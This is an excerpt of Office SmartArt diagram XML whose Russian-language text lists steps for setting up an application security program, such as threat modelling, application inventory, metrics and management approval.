    <dgm:pt modelId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}" type="sibTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8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Работайте с метриками. Принимайте решения об улучшениях и финансировании на основе метрик и данных аналитики. Метрики должны отражать средства и методы обеспечения безопасности, обнаруженные и устраненные уязвимости, покрытие приложения, описание ошибок по типу и количеству и т. п.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9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компании. Учитывайте ошибки и предлагайте поощрения для продвижения улучшений.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" type="parTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}" type="sibTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0945CDD4-9E6A-4629-B151-EFF4819549C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Проведите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2"/>
            </a:rPr>
            <a:t>анализ недостающих возможностей, сравнив свою организацию с другими компаниями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чтобы определить ключевые области улучшения и план действий. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="parTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D76988-94EC-456A-9326-82A5AA778D9E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Получите одобрение руководства и разработайте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3"/>
            </a:rPr>
            <a:t>план повышения осведомленности о безопасности приложений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для данной организации.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" type="parTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E4CEE4-E668-414D-904A-3A62818B4066}" type="sibTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F07B8E8B-96F5-4983-82B3-83A75552F3E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руководство по корректному определению требуемого уровня покрытия и точности.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" type="parTrans" cxnId="{469E487E-F0E4-4400-AA39-3813DAC2D493}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}" type="sibTrans" cxnId="{469E487E-F0E4-4400-AA39-3813DAC2D493}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{146439ED-B762-48F0-BE3C-0D5D54E004EE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и </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="90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приоритизируйте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 приложения и API. Внесите результаты в БД управления конфигурацией. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" type="parTrans" cxnId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}" type="sibTrans" cxnId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABA88485-4799-4A3E-A395-465F2466FC90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4"/>
            </a:rPr>
            <a:t>модель оценки наиболее распространенных угроз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указанием факторов вероятности и риска, отражающих устойчивость вашей организации к атакам. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" type="parTrans" cxnId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}" type="sibTrans" cxnId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84E62741-DE92-5D48-8E11-F5450775D2E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5"/>
            </a:rPr>
            <a:t>программу обеспечения безопасности приложений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начните ее реализацию. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5330F5FD-52B0-144C-814A-D62027712440}" type="parTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C02DB81-333D-C748-8AF4-65359B719E74}" type="sibTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="33961" custScaleY="89341" custLinFactNeighborX="-27" custLinFactNeighborY="338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ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5" custScaleY="104600">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="37047" custScaleY="89239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29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5" custScaleY="114705">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="35119" custScaleY="8936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55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5" custScaleY="101015">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="38961" custScaleY="6412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1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="77788">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="37047" custScaleY="8916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CBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="10204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759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{2F80760B-CAFC-4846-A58F-E09AC74FC5DD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EA88B819-0C50-2040-9AE6-390D3F7E426F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4AAFEA1C-0D0F-B34B-A23B-00BCE0C7AB80}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{846B9F3D-0100-664F-9893-070718EA3806}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E477C266-8354-2E4E-B998-1968C3E9AAC3}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{469E487E-F0E4-4400-AA39-3813DAC2D493}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" srcOrd="3" destOrd="0" parTransId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" sibTransId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}"/>
    <dgm:cxn modelId="{F8C64B7F-B60A-9741-85BE-D7EA2B668159}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BBB13087-447B-294F-AFB1-D3712B8353B8}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D33E389-58B7-1142-A6BD-8178E5656980}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F4310F8C-11E5-BA4B-B000-F69F3EE7507D}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{822FA58E-2B10-AA45-AAA6-D868389BD866}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="3" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{FD9C069B-4BC5-AF4E-B9A3-9EE6325C1020}" type="presOf" srcId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="2" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" srcOrd="1" destOrd="0" parTransId="{5330F5FD-52B0-144C-814A-D62027712440}" sibTransId="{2C02DB81-333D-C748-8AF4-65359B719E74}"/>
    <dgm:cxn modelId="{68BBB4AA-3E44-F24F-96B7-4A0196C78FDE}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{728530B7-9AC5-084C-8F5B-7AD19EC94311}" type="presOf" srcId="{ABA88485-4799-4A3E-A395-465F2466FC90}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6A3585BA-CA15-D445-B363-69657B2B32CF}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B886C4BA-2115-5941-977B-68503F3F259A}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D75BDABB-0E4D-8D48-A5FC-9B1905DA98C5}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{ABA88485-4799-4A3E-A395-465F2466FC90}" srcOrd="1" destOrd="0" parTransId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" sibTransId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="1" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{0792EACF-78FE-9F4E-AB38-6E354F0CE50C}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" srcOrd="2" destOrd="0" parTransId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" sibTransId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
